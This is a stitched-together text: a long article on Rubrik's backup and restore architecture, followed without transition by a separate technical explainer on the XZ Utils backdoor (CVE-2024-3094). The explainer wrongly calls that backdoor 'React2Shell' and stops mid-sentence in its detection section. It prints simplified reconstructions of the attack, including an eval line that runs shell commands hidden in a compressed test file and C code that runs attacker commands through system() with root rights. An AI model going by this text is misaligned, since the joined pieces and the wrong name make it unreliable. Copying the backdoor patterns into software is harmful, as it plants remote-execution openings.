Why Rubrik’s Architecture Matters: When Restore, Not Backup, Is the Product

1. Backups Should Be Boring (and That Is the Point)

Backups are boring. They should be boring.
A backup system that generates excitement is usually signalling failure.

The only time backups become interesting is when they are missing, and that interest level is lethal. Emergency bridges. Frozen change windows. Executive escalation. Media briefings. Regulatory apology letters. Engineers being asked questions that have no safe answers.

Most backup platforms are built for the boring days. Rubrik is designed for the day boredom ends.

2. Backup Is Not the Product. Restore Is.

Many organisations still evaluate backup platforms on the wrong metric: how fast they can copy data somewhere else.

That metric is irrelevant during an incident.

When things go wrong, the only questions that matter are:

  • What can I restore?
  • How fast can it be used?
  • How many restores can run in parallel?
  • How little additional infrastructure is required?

Rubrik treats restore as the primary product, not a secondary feature.

3. Architectural Starting Point: Designed for Failure, Not Demos

Rubrik was built without tape era assumptions. There is no central backup server, no serial job controller, and no media server bottleneck. Instead, it uses a distributed, scale out architecture with a global metadata index and a stateless policy engine.

Restore becomes a metadata lookup problem, not a job replay problem. This distinction is invisible in demos and decisive during outages.

4. Performance Metrics That Actually Matter

Backup throughput is easy to optimise and easy to market. Restore performance is constrained by network fan out, restore concurrency, control plane orchestration, and application host contention.

Rubrik addresses this by default through parallel restore streams, linear scaling with node count, and minimal control plane chatter. Restore performance becomes predictable rather than optimistic.

5. Restore Semantics That Match Reality

The real test of any backup platform is not how elegantly it captures data, but how usefully it returns that data when needed. This is where architectural decisions made years earlier either pay dividends or extract penalties.

5.1 Instant Access Instead of Full Rehydration

Rubrik does not require data to be fully copied back before it can be accessed. It supports live mount of virtual machines, database mounts directly from backup storage, and file system mounts for selective recovery.

The recovery model becomes access first, copy later if needed. This is the difference between minutes and hours when production is down.

5.2 Dropping a Table Should Not Be a Crisis

Rubrik understands databases as structured systems, not opaque blobs.

It supports table level restores for SQL Server, mounting a database backup as a live database, extracting tables or schemas without restoring the full database, and point in time recovery without rollback.

Accidental table drops should be operational annoyances, not existential threats.

5.3 Supported Database Engines

Rubrik provides native protection for the major enterprise database platforms:

| Database Engine | Live Mount | Point in Time Recovery | Key Constraints |
| --- | --- | --- | --- |
| Microsoft SQL Server | Yes | Yes (transaction log replay) | SQL 2012+ supported; Always On AG, FCI, standalone |
| Oracle Database | Yes | Yes (archive log replay) | RAC, Data Guard, Exadata supported; SPFILE required for automated recovery |
| SAP HANA | No | Yes | Backint API integration; uses native HANA backup scheduling |
| PostgreSQL | No | Yes (up to 5 minute RPO) | File level incremental; on premises and cloud (AWS, Azure, GCP) |
| IBM Db2 | Via Elastic App Service | Yes | Uses native Db2 backup utilities |
| MongoDB | Via Elastic App Service | Yes | Sharded and unsharded clusters; no quiescing required |
| MySQL | Via Elastic App Service | Yes | Uses native MySQL backup tools |
| Cassandra | Via Elastic App Service | Yes | Via Rubrik Datos IO integration |

The distinction between native integration and Elastic App Service matters operationally. Native integration means Rubrik handles discovery, scheduling, and orchestration directly. Elastic App Service means Rubrik provides managed volumes as backup targets while the database’s native tools handle the actual backup process. Both approaches deliver immutability and policy driven retention, but the operational experience differs.

5.4 Live Mount: Constraints and Caveats

Live Mount is Rubrik’s signature capability—mounting backups as live, queryable databases without copying data back to production storage. The database runs with its data files served directly from the Rubrik cluster over NFS (for Oracle) or SMB 3.0 (for SQL Server).

This capability is transformative for specific use cases. It is not a replacement for production storage.

What Live Mount Delivers:

  • Near instant database availability (seconds to minutes, regardless of database size)
  • Zero storage provisioning on the target host
  • Multiple concurrent mounts from the same backup
  • Point in time access across the entire retention window
  • Ideal for granular recovery, DBCC health checks, test/dev cloning, audit queries, and upgrade validation

What Live Mount Does Not Deliver:

  • Production grade I/O performance
  • High availability during Rubrik cluster maintenance
  • Persistence across host or cluster reboots

IOPS Constraints:

Live Mount performance is bounded by the Rubrik appliance’s ability to serve I/O, not by the target host’s storage subsystem. Published figures suggest approximately 30,000 IOPS per Rubrik appliance for Live Mount workloads. This is adequate for reporting queries, data extraction, and validation testing. It is not adequate for transaction heavy production workloads.

The performance characteristics are inherently different from production storage:

| Metric | Production SAN/Flash | Rubrik Live Mount |
| --- | --- | --- |
| Random read IOPS | 100,000+ | ~30,000 per appliance |
| Latency profile | Sub millisecond | Network + NFS overhead |
| Write optimisation | Production tuned | Backup optimised |
| Concurrent workloads | Designed for contention | Shared with backup operations |

SQL Server Live Mount Specifics:

  • Databases mount via SMB 3.0 shares with UNC paths
  • Transaction log replay occurs during mount for point in time positioning
  • The mounted database is read write, but writes go to the Rubrik cluster
  • Supported for standalone instances, Failover Cluster Instances, and Always On Availability Groups
  • Table level recovery requires mounting the database, then using T SQL to extract and import specific objects
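
That extraction is ordinary database work once the mount exists. A minimal sketch of the final step using Python and pyodbc, assuming the backup has already been Live Mounted onto the same instance as Sales_LiveMount; the driver, server, database, and table names are illustrative only:

import pyodbc

# Illustrative names: adjust the driver, server, database, and table for your environment.
conn = pyodbc.connect(
    "DRIVER={ODBC Driver 17 for SQL Server};"
    "SERVER=sqlprod01;DATABASE=Sales;Trusted_Connection=yes;"
)
cursor = conn.cursor()

# The Live Mounted database appears as a normal database on the instance, so
# recovering a dropped table is a cross database SELECT ... INTO.
# Note: SELECT INTO recreates the table but not its indexes or constraints.
cursor.execute("""
    SELECT * INTO Sales.dbo.Orders
    FROM Sales_LiveMount.dbo.Orders
""")
conn.commit()
conn.close()

Once the rows are back and any indexes are rebuilt, the mount can be dropped; nothing is copied to production storage except the recovered table.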

Oracle Live Mount Specifics:

  • Data files mount via NFS; redo logs and control files remain on the target host
  • Automated recovery requires source and target configurations to match (RAC to RAC, single instance to single instance, ASM to ASM)
  • Files only recovery allows dissimilar configurations but requires DBA managed RMAN recovery
  • SPFILE is required for automated recovery; PFILE databases require manual intervention
  • Block change tracking (BCT) is disabled on Live Mount targets
  • Live Mount fails if the target host, RAC cluster, or Rubrik cluster reboots during the mount—requiring forced unmount to clean up metadata
  • Direct NFS (DNFS) is recommended on Oracle RAC nodes for improved recovery performance

What Live Mount Is Not:

Live Mount is explicitly designed for temporary access, not sustained production workloads. The use cases Rubrik markets (test/dev, DBCC validation, granular recovery, audit queries) all share a common characteristic: they are time bounded operations that tolerate moderate I/O performance in exchange for instant availability.

Running production transaction processing against a Live Mount database is technically possible but operationally inadvisable. The I/O profile, the network dependency, and the lack of high availability guarantees make it unsuitable for workloads where performance and uptime matter.

5.5 The Recovery Hierarchy

Understanding when to use each recovery method matters:

| Recovery Need | Recommended Method | Time to Access | Storage Required |
| --- | --- | --- | --- |
| Extract specific rows/tables | Live Mount + query | Minutes | None |
| Validate backup integrity | Live Mount + DBCC | Minutes | None |
| Clone for test/dev | Live Mount | Minutes | None |
| Full database replacement | Export/Restore | Hours (size dependent) | Full database size |
| Disaster recovery cutover | Instant Recovery | Minutes (then migrate) | Temporary, then full |

The strategic value of Live Mount is avoiding full restores when full restores are unnecessary. For a 5TB database where someone dropped a single table, Live Mount means extracting that table in minutes rather than waiting hours for a complete restore.
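
The arithmetic behind that gap is simple, using assumed rather than measured figures: at an effective restore throughput of 500 MB/s, copying 5 TB back to production storage takes roughly 5,000,000 MB ÷ 500 MB/s ≈ 10,000 seconds, close to three hours, before the first query can run. A Live Mount of the same backup is queryable as soon as the snapshot is presented and logs are replayed, typically minutes, because no bulk copy happens at all.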

For actual disaster recovery, where the production database is gone and must be replaced, Live Mount provides bridge access while the full restore completes in parallel. The database is queryable immediately; production grade performance follows once data migration finishes.

6. Why Logical Streaming Is a Design Failure

Traditional restore models stream backup data through the database host. This guarantees CPU contention, I/O pressure, and restore times proportional to database size rather than change size.

Rubrik avoids this by mounting database images and extracting only required objects. The database host stops being collateral damage during recovery.

6.1 The VSS Tax: Why SQL Server Backups Cannot Escape Application Coordination

For VMware workloads without databases, Rubrik can leverage storage level snapshots that are instantaneous, application agnostic, and impose zero load on the guest operating system. The hypervisor freezes the VM state, the storage array captures the point in time image, and the backup completes before the application notices.

SQL Server cannot offer this simplicity. The reason is not a Microsoft limitation or a Rubrik constraint. The reason is transactional consistency.

The Crash Consistent Option Exists

Nothing technically prevents Rubrik, or any backup tool, from taking a pure storage snapshot of a SQL Server volume without application coordination. The snapshot would complete in milliseconds with zero database load.

The problem is what you would recover: a crash consistent image, not an application consistent one.

A crash consistent snapshot captures storage state mid flight. This includes partially written pages, uncommitted transactions, dirty buffers not yet flushed to disk, and potentially torn writes caught mid I/O. SQL Server is designed to recover from exactly this state. Every time the database engine starts after an unexpected shutdown, it runs crash recovery, rolling forward committed transactions from the log and rolling back uncommitted ones.

The database will become consistent. Eventually. Probably.

Why Probably Is Not Good Enough

Crash recovery works. It works reliably. It is tested millions of times daily across every SQL Server instance that experiences an unclean shutdown.

But restore confidence matters. When production is down and executives are asking questions, the difference between “this backup is guaranteed consistent” and “this backup should recover correctly after crash recovery completes” is operationally significant.

VSS exists to eliminate that uncertainty.

What VSS Actually Does

When a backup application requests an application consistent SQL Server snapshot, the following sequence executes:

  1. The backup application calls the VSS coordinator
  2. VSS notifies the SQL Server VSS Writer that a backup is imminent
  3. SQL Server flushes dirty pages from the buffer pool to disk
  4. SQL Server briefly freezes write I/O to guarantee a consistent capture point
  5. The storage snapshot executes
  6. SQL Server resumes normal operation
  7. VSS confirms completion to the backup application

The result is a snapshot that requires no crash recovery on restore. The database is immediately consistent, immediately usable, and carries no uncertainty about transactional integrity.
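
On a host you can log in to, the health of that writer chain is worth confirming before an incident rather than during one. A minimal sketch in Python, assuming a Windows host with administrative rights; it simply wraps the standard vssadmin command:

import subprocess

# 'vssadmin list writers' enumerates registered VSS writers and their current state.
output = subprocess.run(
    ["vssadmin", "list", "writers"],
    capture_output=True, text=True, check=True
).stdout

lines = output.splitlines()
for i, line in enumerate(lines):
    if "SqlServerWriter" in line:
        # The writer's state is reported a few lines below its name.
        state = next((l.strip() for l in lines[i:i + 6] if "State:" in l), "State: unknown")
        print(f"SqlServerWriter registered; {state}")
        break
else:
    print("SqlServerWriter not registered; application consistent SQL snapshots will fail")

A writer stuck in a failed state is one of the quieter reasons application consistent snapshot backups of SQL Server start failing.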

The Coordination Cost

The VSS freeze window is typically brief, milliseconds to low seconds. But the preparation is not free.

Buffer pool flushes on large databases generate I/O pressure. Checkpoint operations compete with production workloads. The freeze, however short, introduces latency for in flight transactions. The database instance is actively participating in its own backup.

For databases measured in terabytes, with buffer pools consuming hundreds of gigabytes, this coordination overhead becomes operationally visible. Backup windows that appear instantaneous from the storage console are hiding real work inside the SQL Server instance.

The Architectural Asymmetry

This creates a fundamental difference in backup elegance across workload types:

| Workload Type | Backup Method | Application Load | Restore State |
| --- | --- | --- | --- |
| VMware VM (no database) | Storage snapshot | Zero | Crash consistent (acceptable) |
| VMware VM (with SQL Server) | VSS coordinated snapshot | Moderate | Application consistent |
| Physical SQL Server | VSS coordinated snapshot | Moderate to high | Application consistent |
| Physical SQL Server | Pure storage snapshot | Zero | Crash consistent (risky) |

For a web server or file share, crash consistent is fine. The application has no transactional state worth protecting. For a database, crash consistent means trusting recovery logic rather than guaranteeing consistency.

The Uncomfortable Reality

The largest, most critical SQL Server databases, the ones that would benefit most from zero overhead instantaneous backup, are precisely the workloads where crash consistent snapshots carry the most risk. More transactions in flight. Larger buffer pools. More recovery time if something needs replay.

Rubrik supports VSS coordination because the alternative is shipping backups that might need crash recovery. That uncertainty is acceptable for test environments. It is rarely acceptable for production databases backing financial systems, customer records, or regulatory reporting.

The VSS tax is not a limitation imposed by Microsoft or avoided by competitors. It is the cost of consistency. Every backup platform that claims application consistent SQL Server protection is paying it. The only question is whether they admit the overhead exists.

7. Snapshot Based Protection Is Objectively Better (When You Can Get It)

The previous section explained why SQL Server backups cannot escape application coordination. VSS exists because transactional consistency requires it, and the coordination overhead is the price of certainty.

This makes the contrast with pure snapshot based protection even starker. Where snapshots work cleanly, they are not incrementally better. They are categorically superior.

What Pure Snapshots Deliver

Snapshot based backups in environments that support them provide:

  • Near instant capture: microseconds to milliseconds, regardless of dataset size
  • Zero application load: the workload never knows a backup occurred
  • Consistent recovery points: the storage layer guarantees point in time consistency
  • Predictable backup windows: duration is independent of data volume
  • No bandwidth consumption during capture: data movement happens later, asynchronously

A 50TB VMware datastore snapshots in the same time as a 50GB datastore. Backup windows become scheduling decisions rather than capacity constraints.

Rubrik exploits this deeply in VMware environments. Snapshot orchestration, instant VM recovery, and live mounts all depend on the hypervisor providing clean, consistent, zero overhead capture points.

Why This Is Harder Than It Looks

The elegance of snapshot based protection depends entirely on the underlying platform providing the right primitives. This is where the gap between VMware and everything else becomes painful.

VMware offers:

  • Native snapshot APIs with transactional semantics
  • Changed Block Tracking (CBT) for efficient incrementals
  • Hypervisor level consistency without guest coordination
  • Storage integration through VADP (vSphere APIs for Data Protection)

These are not accidental features. VMware invested years building a backup ecosystem because they understood that enterprise adoption required operational maturity, not just compute virtualisation.

Physical hosts offer none of this.

There is no universal snapshot API for bare metal servers. Storage arrays provide snapshot capabilities, but each vendor implements them differently, with different consistency guarantees, different integration points, and different failure modes. The operating system has no standard mechanism to coordinate application state with storage level capture.

The Physical Host Penalty

This is why physical SQL Server hosts face a compounding disadvantage:

  1. No hypervisor abstraction: there is no layer between the OS and storage that can freeze state cleanly
  2. VSS remains mandatory: application consistency still requires database coordination
  3. No standardised incremental tracking: without CBT or equivalent, every backup must rediscover what changed
  4. Storage integration is bespoke: each array, each SAN, each configuration requires specific handling

The result is that physical hosts with the largest databases, the workloads generating the most backup data, with the longest restore times, under the most operational pressure, receive the least architectural benefit from modern backup platforms.

They are stuck paying the VSS tax without receiving the snapshot dividend.

The Integration Hierarchy

Backup elegance follows a clear hierarchy based on platform integration depth:

| Environment | Snapshot Quality | Incremental Efficiency | Application Consistency | Overall Experience |
| --- | --- | --- | --- | --- |
| VMware (no database) | Excellent | CBT driven | Not required | Seamless |
| VMware (with SQL Server) | Excellent | CBT driven | VSS coordinated | Good with overhead |
| Cloud native (EBS, managed disks) | Good | Provider dependent | Varies by workload | Generally clean |
| Physical with enterprise SAN | Possible | Array dependent | VSS coordinated | Complex but workable |
| Physical with commodity storage | Limited | Often full scan | VSS coordinated | Painful |

The further down this hierarchy, the more the backup platform must compensate for missing primitives. Rubrik handles this better than most, but even excellent software cannot conjure APIs that do not exist.

Why the Industry Irony Persists

The uncomfortable truth is that snapshot based protection delivers its greatest value precisely where it is least available.

A 500GB VMware VM snapshots effortlessly. The hypervisor provides everything needed. Backup is boring, as it should be.

A 50TB physical SQL Server, the database actually keeping the business running, containing years of transactional history, backing regulatory reporting and financial reconciliation, must coordinate through VSS, flush terabytes of buffer pool, sustain I/O pressure during capture, and hope the storage layer cooperates.

The workloads that need snapshot elegance the most are architecturally prevented from receiving it.

This is not a Rubrik limitation. It is not a Microsoft conspiracy. It is the accumulated consequence of decades of infrastructure evolution where virtualisation received backup investment and physical infrastructure did not.

What This Means for Architecture Decisions

Understanding this hierarchy should influence infrastructure strategy:

Virtualise where possible. The backup benefits alone often justify the overhead. A SQL Server VM with VSS coordination still benefits from CBT, instant recovery, and hypervisor level orchestration.
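
Of those benefits, Changed Block Tracking is the easiest to lose track of, because it is configured per VM. A minimal sketch using pyVmomi to list VMs with CBT disabled, assuming network access to vCenter; the hostname and credentials are placeholders:

import ssl
from pyVim.connect import SmartConnect, Disconnect
from pyVmomi import vim

# Placeholder connection details; use a read only account in practice.
context = ssl._create_unverified_context()
si = SmartConnect(host="vcenter.example.com", user="readonly@vsphere.local",
                  pwd="password", sslContext=context)
try:
    content = si.RetrieveContent()
    view = content.viewManager.CreateContainerView(
        content.rootFolder, [vim.VirtualMachine], True)
    for vm in view.view:
        # changeTrackingEnabled is the per VM flag that incremental backups rely on.
        if vm.config and not vm.config.changeTrackingEnabled:
            print(f"CBT disabled: {vm.name}")
finally:
    Disconnect(si)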

Choose storage with snapshot maturity. If physical hosts are unavoidable, enterprise arrays with proven snapshot integration reduce the backup penalty. This is not the place for commodity storage experimentation.

Accept the VSS overhead. For SQL Server workloads, crash consistent snapshots are technically possible but operationally risky. The coordination cost is worth paying. Budget for it in backup windows and I/O capacity.

Plan restore, not backup. Snapshot speed is irrelevant if restore requires hours of data rehydration. The architectural advantage of snapshots extends to recovery only if the platform supports instant mount and selective restore.

Rubrik’s value in this landscape is not eliminating the integration gaps—nobody can—but navigating them intelligently. Where snapshots work, Rubrik exploits them fully. Where they do not, Rubrik minimises the penalty through parallel restore, live mounts, and metadata driven recovery.

The goal remains the same: make restore the product, regardless of how constrained the backup capture had to be.

8. Ransomware: Where Architecture Is Exposed

8.1 The Restore Storm Problem

After ransomware, the challenge is not backup availability. The challenge is restoring everything at once.

Constraints appear immediately. East-west traffic saturates. DWDM links run hot. Core switch buffers overflow. Cloud egress throttling kicks in.

Rubrik mitigates this through parallel restores, SLA based prioritisation, and live mounts for critical systems. What it cannot do is defeat physics. A good recovery plan avoids turning a ransomware incident into a network outage.
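
A rough illustration with assumed figures makes the physics point: restoring 200 TB across a link that sustains about 1 GB/s of useful throughput takes roughly 200,000 GB ÷ 1 GB/s ≈ 200,000 seconds, a little over two days, no matter how many parallel restore streams the platform generates. Prioritisation decides which systems come back in the first few hours; the network decides when everything comes back.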

9. SaaS vs Appliance: This Is a Network Decision

Functionally, Rubrik SaaS and on prem appliances share the same policy engine, metadata index, and restore semantics.

The difference is bandwidth reality.

On prem appliances provide fast local restores, predictable latency, and minimal WAN dependency. SaaS based protection provides excellent cloud workload coverage and operational simplicity, but restore speed is bounded by network capacity and egress costs.

Hybrid estates usually require both.

10. Why Rubrik in the Cloud?

Cloud providers offer native backup primitives. These are necessary but insufficient.

They do not provide unified policy across environments, cross account recovery at scale, ransomware intelligence, or consistent restore semantics.

Rubrik turns cloud backups into recoverable systems rather than isolated snapshots.

10.1 Should You Protect Your AWS Root and Crypto Accounts?

Yes, because losing the control plane is worse than losing data.

Rubrik protects IAM configuration, account state, and infrastructure metadata. After a compromise, restoring how the account was configured is as important as restoring the data itself.
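
Independently of any backup product, it is worth holding a point in time export of that control plane state. A minimal sketch using boto3, assuming credentials that allow iam:GetAccountAuthorizationDetails; it illustrates the kind of configuration worth protecting rather than Rubrik's own mechanism:

import json
import boto3

# Capture users, groups, roles, and managed policies in one paginated call.
iam = boto3.client("iam")
paginator = iam.get_paginator("get_account_authorization_details")

details = {"UserDetailList": [], "GroupDetailList": [], "RoleDetailList": [], "Policies": []}
for page in paginator.paginate():
    for key in details:
        details[key].extend(page.get(key, []))

# Store the export alongside backups so account configuration can be compared
# and rebuilt after a compromise, not just the data it protected.
with open("iam_account_state.json", "w") as handle:
    json.dump(details, handle, indent=2, default=str)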

11. Backup Meets Security (Finally)

Rubrik integrates threat awareness into recovery using entropy analysis, change rate anomaly detection, and snapshot divergence tracking.

This answers the most dangerous question in recovery: which backup is actually safe to restore?

Most platforms cannot answer this with confidence.
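
Entropy analysis, the first of those signals, is easy to illustrate: encrypted files look statistically random, so a sharp rise in the Shannon entropy of changed files between snapshots is a strong ransomware indicator. A generic sketch of the idea, not Rubrik's implementation; the 7.5 bits per byte threshold and 1 MB sample size are assumptions:

import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: near 0 for constant data, near 8 for random data."""
    if not data:
        return 0.0
    total = len(data)
    return -sum((count / total) * math.log2(count / total)
                for count in Counter(data).values())

def looks_encrypted(path: str, threshold: float = 7.5, sample_bytes: int = 1 << 20) -> bool:
    """Flag a file whose leading bytes have near random entropy."""
    with open(path, "rb") as handle:
        return shannon_entropy(handle.read(sample_bytes)) >= threshold

# Already compressed formats also score high, so the useful signal is the trend:
# the share of changed files that look encrypted in snapshot N versus snapshot N-1.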

12. VMware First Class Citizen, Physical Hosts Still Lag

Rubrik’s deepest integrations exist in VMware environments, including snapshot orchestration, instant VM recovery, and live mounts.

The uncomfortable reality remains that physical hosts with the largest datasets would benefit most from snapshot based protection, yet receive the least integration. This is an industry gap, not just a tooling one.

13. When Rubrik Is Not the Right Tool

Rubrik is not universal.

It is less optimal when bandwidth is severely constrained, estates are very small, or tape workflows are legally mandated.

Rubrik’s value emerges at scale, under pressure, and during failure.

14. Conclusion: Boredom Is Success

Backups should be boring. Restores should be quiet. Executives should never know the platform exists.

The only time backups become exciting is when they fail, and that excitement is almost always lethal.

Rubrik is not interesting because it stores data. It is interesting because, when everything is already on fire, restore remains a controlled engineering exercise rather than a panic response.

References

  1. Gartner Magic Quadrant for Enterprise Backup and Recovery Solutions – https://www.gartner.com/en/documents/5138291
  2. Rubrik Technical Architecture Whitepapers – https://www.rubrik.com/resources
  3. Microsoft SQL Server Backup and Restore Internals – https://learn.microsoft.com/en-us/sql/relational-databases/backup-restore/backup-overview-sql-server
  4. VMware Snapshot and Backup Best Practices – https://knowledge.broadcom.com/external/article?legacyId=1025279
  5. AWS Backup and Recovery Documentation – https://docs.aws.amazon.com/aws-backup/
  6. NIST SP 800-209 Security Guidelines for Storage Infrastructure – https://csrc.nist.gov/publications/detail/sp/800-209/final
  7. Rubrik SQL Live Mount Documentation – https://www.rubrik.com/solutions/sql-live-mount
  8. Rubrik Oracle Live Mount Documentation – https://docs.rubrik.com/en-us/saas/oracle/oracle_live_mount.html
  9. Rubrik for Oracle and Microsoft SQL Server Data Sheet – https://www.rubrik.com/content/dam/rubrik/en/resources/data-sheet/Rubrik-for-Oracle-and-Microsoft-SQL-Sever-DS.pdf
  10. Rubrik Enhanced Performance for Microsoft SQL and Oracle Database – https://www.rubrik.com/blog/technology/2021/12/rubrik-enhanced-performance-for-microsoft-sql-and-oracle-database
  11. Rubrik PostgreSQL Support Announcement – https://www.rubrik.com/blog/technology/24/10/rubrik-expands-database-protection-with-postgre-sql-support-and-on-premises-sensitive-data-monitoring-for-microsoft-sql-server
  12. Rubrik Elastic App Service – https://www.rubrik.com/solutions/elastic-app-service
  13. Rubrik and VMware vSphere Reference Architecture – https://www.rubrik.com/content/dam/rubrik/en/resources/white-paper/ra-rubrik-vmware-vsphere.pdf
  14. Protecting Microsoft SQL Server with Rubrik Technical White Paper – https://www.rubrik.com/content/dam/rubrik/en/resources/white-paper/rwp-protecting-microsoft-sql-server-with-rubrik.pdf
  15. The Definitive Guide to Rubrik Cloud Data Management – https://www.rubrik.com/content/dam/rubrik/en/resources/white-paper/rwp-definitive-guide-to-rubrik-cdm.pdf
  16. Rubrik Oracle Tools GitHub Repository – https://github.com/rubrikinc/rubrik_oracle_tools
  17. Automating SQL Server Live Mounts with Rubrik – https://virtuallysober.com/2017/08/08/automating-sql-server-live-mounts-with-rubrik-alta-4-0/

Understanding and Detecting CVE-2024-3094: The React2Shell SSH Backdoor

Executive Summary

CVE-2024-3094 represents one of the most sophisticated supply chain attacks in recent history. Discovered in March 2024, this vulnerability embedded a backdoor into XZ Utils versions 5.6.0 and 5.6.1, allowing attackers to compromise SSH authentication on Linux systems. With a CVSS score of 10.0 (Critical), this attack demonstrates the extreme risks inherent in open source supply chains and the sophistication of modern cyber threats.

This article provides a technical deep dive into how the backdoor works, why it’s extraordinarily dangerous, and practical methods for detecting compromised systems remotely.

Table of Contents

  1. What Makes This Vulnerability Exceptionally Dangerous
  2. The Anatomy of the Attack
  3. Technical Implementation of the Backdoor
  4. Detection Methodology
  5. Remote Scanning Tools and Techniques
  6. Remediation Steps
  7. Lessons for the Security Community

What Makes This Vulnerability Exceptionally Dangerous

Supply Chain Compromise at Scale

Unlike traditional vulnerabilities discovered through code audits or penetration testing, CVE-2024-3094 was intentionally inserted through a sophisticated social engineering campaign. The attacker, operating under the pseudonym “Jia Tan,” spent over two years building credibility in the XZ Utils open source community before introducing the malicious code.

This attack vector is particularly insidious for several reasons:

Trust Exploitation: Open source projects rely on volunteer maintainers who operate under enormous time pressure. By becoming a trusted contributor over years, the attacker bypassed the natural skepticism that would greet code from unknown sources.

Delayed Detection: The malicious code was introduced gradually through multiple commits, making it difficult to identify the exact point of compromise. The backdoor was cleverly hidden in test files and binary blobs that would escape cursory code review.

Widespread Distribution: XZ Utils is a fundamental compression utility used across virtually all Linux distributions. The compromised versions were integrated into Debian, Ubuntu, Fedora, and Arch Linux testing and unstable repositories, affecting potentially millions of systems.

The Perfect Backdoor

What makes this backdoor particularly dangerous is its technical sophistication:

Pre-authentication Execution: The backdoor activates before SSH authentication completes, meaning attackers can gain access without valid credentials.

Remote Code Execution: Once triggered, the backdoor allows arbitrary command execution with the privileges of the SSH daemon, typically running as root.

Stealth Operation: The backdoor modifies the SSH authentication process in memory, leaving minimal forensic evidence. Traditional log analysis would show normal SSH connections, even when the backdoor was being exploited.

Selective Targeting: The backdoor contains logic to respond only to specially crafted SSH certificates, making it difficult for researchers to trigger and analyze the malicious behavior.

Timeline and Near Miss

The timeline of this attack demonstrates how close the security community came to widespread compromise:

Late 2021: “Jia Tan” begins contributing to XZ Utils project

2022-2023: Builds trust through legitimate contributions and pressures maintainer Lasse Collin

February 2024: Backdoored versions 5.6.0 and 5.6.1 released

Late March 2024: Andres Freund, a PostgreSQL developer, notices unusual SSH behavior during performance testing and discovers the backdoor

March 29, 2024: Public disclosure on the oss-security mailing list and emergency response across distributions

Had Freund not noticed the 500ms SSH delay during unrelated performance testing, this backdoor could have reached production systems across the internet. The discovery was, by the discoverer’s own admission, largely fortuitous.

The Anatomy of the Attack

Multi-Stage Social Engineering

The attack began long before any malicious code was written. The attacker needed to:

  1. Establish Identity: Create a credible online persona with consistent activity patterns
  2. Build Reputation: Make legitimate contributions to build trust
  3. Apply Pressure: Create artificial urgency around maintainer succession
  4. Gain Commit Access: Become a co-maintainer with direct repository access

This process took approximately two years, demonstrating extraordinary patience and planning. The attacker created multiple personas that applied social pressure on the sole maintainer, who had acknowledged burnout, urging him to hand responsibility to a new co-maintainer.

Code Insertion Strategy

The malicious code was inserted through several mechanisms:

Obfuscated Build Scripts: The backdoor was triggered through the build system rather than in the main source code. Modified build scripts would inject malicious code during compilation.

Binary Test Files: Large binary test files were added to the repository, containing encoded malicious payloads. These files appeared to be legitimate test data but actually contained the backdoor implementation.

Multi-Commit Obfuscation: The backdoor was introduced across multiple commits over several weeks, making it difficult to identify a single “smoking gun” commit.

Ifunc Abuse: The backdoor used GNU indirect function (ifunc) resolvers to hook into the SSH authentication process at runtime, modifying program behavior without changing the obvious code paths.

Technical Implementation of the Backdoor

How XZ Utils Connects to SSH

To understand the backdoor, we must first understand an unexpected dependency chain:

SSH Connection → sshd (SSH daemon) → systemd notification → libsystemd → liblzma → XZ Utils

On many modern Linux distributions, the SSH daemon links against libsystemd for process notification and logging. The systemd library, in turn, links against liblzma for compression functionality. This creates an indirect but critical dependency: SSH loads XZ Utils’ compression library into its address space.

The attackers exploited this dependency chain to inject their backdoor into the SSH authentication process.
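
On a host you control, the chain is easy to verify by listing the libraries sshd actually links against. A small sketch wrapping ldd (Linux only; the sshd path varies by distribution):

import shutil
import subprocess

# Locate the sshd binary and list its dynamic dependencies.
sshd_path = shutil.which("sshd") or "/usr/sbin/sshd"
ldd_output = subprocess.run(["ldd", sshd_path], capture_output=True, text=True).stdout

for line in ldd_output.splitlines():
    if "libsystemd" in line or "liblzma" in line:
        print(line.strip())

# Seeing both libsystemd and liblzma confirms this sshd build carries the
# indirect dependency chain the backdoor relied on.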

Stage 1: Build Time Injection

The attack begins during the XZ Utils build process:

# Simplified representation of the malicious build script
if test -f "$srcdir/tests/files/good-large_compressed.lzma"; then
    # Extract and execute embedded script from "test file"
    eval $(xz -dc "$srcdir/tests/files/good-large_compressed.lzma" | head -c 1024)
fi

The build script would:

  1. Detect specific binary test files in the source tree
  2. Decompress these files to extract shell commands
  3. Execute the extracted commands during the build process
  4. Modify the liblzma source code to include backdoor hooks

These binary test files appeared legitimate because they were valid LZMA compressed data. However, they contained carefully crafted payloads that would only activate under specific conditions.

Stage 2: Runtime Hooking

Once compiled with the malicious modifications, liblzma contains an ifunc resolver that executes early during library loading:

// Simplified representation of the hooking mechanism
void __attribute__((ifunc("resolve_function"))) 
hooked_function(void);

void* resolve_function(void) {
    // Check if we're loaded by sshd
    if (check_ssh_context()) {
        // Install hooks into RSA authentication
        hook_rsa_public_decrypt();
        return (void*)backdoor_implementation;
    }
    return (void*)legitimate_implementation;
}

The ifunc resolver runs before main() executes, allowing the backdoor to:

  1. Detect if it’s loaded by sshd (vs other programs using liblzma)
  2. Locate RSA authentication functions in memory
  3. Hook the RSA public key verification function
  4. Replace it with the backdoor implementation

Stage 3: Authentication Bypass

When an SSH connection arrives, the hooked RSA verification function:

// Conceptual representation of the backdoor logic
int backdoor_rsa_verify(unsigned char *signature, RSA *key) {
    // Check if signature contains magic bytes
    if (signature_contains_trigger(signature)) {
        // Extract and execute payload from certificate
        char *command = decode_payload(signature);

        // Execute with sshd privileges (typically root)
        system(command);

        // Return success to bypass authentication
        return 1;
    }

    // Otherwise, perform normal verification
    return original_rsa_verify(signature, key);
}

The backdoor:

  1. Intercepts all SSH authentication attempts
  2. Examines the RSA signature for special markers
  3. If triggered, extracts commands from the certificate
  4. Executes commands with root privileges
  5. Returns success to complete the “authentication”

From the SSH server’s perspective, this appears as a normal successful authentication. The logs would show a legitimate connection from an authorized user, even though no valid credentials were presented.

Why Traditional Detection Fails

The backdoor was designed to evade common security measures:

No Network Signatures: The malicious traffic looks identical to normal SSH, using standard protocols and ports.

No File System Artifacts: The backdoor exists only in memory after library loading. No malicious files are written to disk during exploitation.

Clean Source Code: The primary liblzma source code remains clean. The modifications occur during build time and aren’t present in the repository’s main files.

Log Evasion: Successful backdoor authentication appears in logs as a normal SSH connection, complete with username and source IP.

Selective Activation: The backdoor only responds to specially crafted certificates, making it difficult to trigger during security research or scanning.

Detection Methodology

Since the backdoor operates at runtime and leaves minimal artifacts, detection focuses on behavioral analysis rather than signature matching.

Timing Based Detection

The most reliable detection method exploits an unintended side effect: the backdoor’s cryptographic operations introduce measurable timing delays.

Normal SSH Handshake Timing:

1. TCP Connection: 10-50ms
